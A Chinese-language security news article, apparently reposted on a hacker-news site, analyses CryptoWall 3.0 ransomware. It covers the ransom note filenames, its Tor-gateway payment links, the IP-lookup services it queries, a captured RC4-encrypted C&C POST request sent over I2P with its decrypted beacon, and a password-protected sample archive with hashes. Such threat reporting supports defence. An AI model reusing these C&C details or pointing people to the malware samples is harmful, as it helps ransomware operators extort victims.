使用I2P匿名网络通信,又一款勒索软件CryptoWall 3.0来了

使用I2P匿名网络通信,又一款勒索软件CryptoWall 3.0来了

qq黑客访客2021-10-11 23:59:003253A+A-

  FreeBuf已经报道过不计其数的勒索软件,而最近研究人员又发现了一款特别的——它使用I2P匿名网络进行通信,名为Cryptowall 3.0。

  一天感染288个用户

  来自法国的安全研究员Kafeine在其博客中确认了这款软件使用I2P匿名网络进行C&C通讯,在@Horgh_RCE的反编译下为我们揭开了Cryptowall 3.0的面纱。

  微软提供的数据显示从1月11日至1月12日一天时间里,Cryptowall感染了288个用户。

  相较之前的变种,软件在用于勒索的提示文件的文件名上有少许变化:

  HELP_DECRYPT.HTML

  HELP_DECRYPT.PNG

  HELP_DECRYPT.TXT

  HELP_DECRYPT.URL

  贴心的用户体验

  以下则是HELP_DECRYPT.PNG的内容:

  该款勒索软件十分贴心,HELP_DECRYPT.PNG语言版本是根据用户的IP决定的,如法国安全研究员Kafeine的HELP_DECRYPT.PNG:

  针对不同的用户,文中的链接也各不相同。以下是Kafeine提供的一组链接:

  http://paytoc4gtpn5czl2.torforall.com/1c3L59z

  http://paytoc4gtpn5czl2.torman2.com/1c3L59z

  http://paytoc4gtpn5czl2.torwoman.com/1c3L59z

  http://paytoc4gtpn5czl2.torroadsters.com/1c3L59z

  软件完成对用户文件的加密后会提示用户使用比特币支付赎金。自CoinVault之后,免费解密一个文件似乎要变成行业标准了,CryptoWall 3.0也附带了这一功能:

  软件使用以下服务获取IP:

  "http://ip-addr.es"

  "http://myexternalip.com/raw"

  "http://curlmyip.com"

  I2P协议传输

  与C&C服务器的通讯似乎是通过Rc4加密了,并且数据通过i2p协议传输:

  ————–数据稍经修改——-

  POST http://proxy2-2-2.i2p/p1256nl9su84v HTTP/1.1

  Accept: **

  Content-Type: application/x-www-form-urlencoded

  Pragma: no-cache

  Content-Length: 134

  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)

  Host: proxy1-1-1.i2p

  z=1eeac100e243ed18d3feef446e7800f38c49dc63d7142ce2c024d6a6502e109fcdcee52fa6e59d45648f195d8579265652c334af833ebc7f8e40edcc55ac1c6db626

  ————————————————–

  经过解密后的数据:(不要尝试解密前面的数据,我们故意修改了有些十六进制数)

  z={1|crypt1|27CE3C5E636291E531C77FA566559DDF|2|1|2||xxx.xxx.xxx.xxx}

  样本下载

  Cryptowall_3.0.zip,密码:infected

  文件应包含6c3e6143ab699d6b78551d417c0a1a45和47363b94cee907e2b8926c1be61150c7

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 3条评论
  • 嘻友温人2022-05-30 17:59:33
  • 6db626  ————————————————–  经过解密后的数据:(不要尝试解密前面的数据,我们故意修改了有些十六进制数)  z={1|crypt1|27CE3C5E636291E531C77FA566559DDF|2|1|2||xxx.xxx.xxx.xxx}  样本下载  Crypto
  • 绿邪莘夏2022-05-30 16:01:10
  • G语言版本是根据用户的IP决定的,如法国安全研究员Kafeine的HELP_DECRYPT.PNG:  针对不同的用户,文中的链接也各不相同。以下是Kafeine提供的一组链接:  http://p
  • 语酌俗野2022-05-30 16:08:47
  • o-cache  Content-Length: 134  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理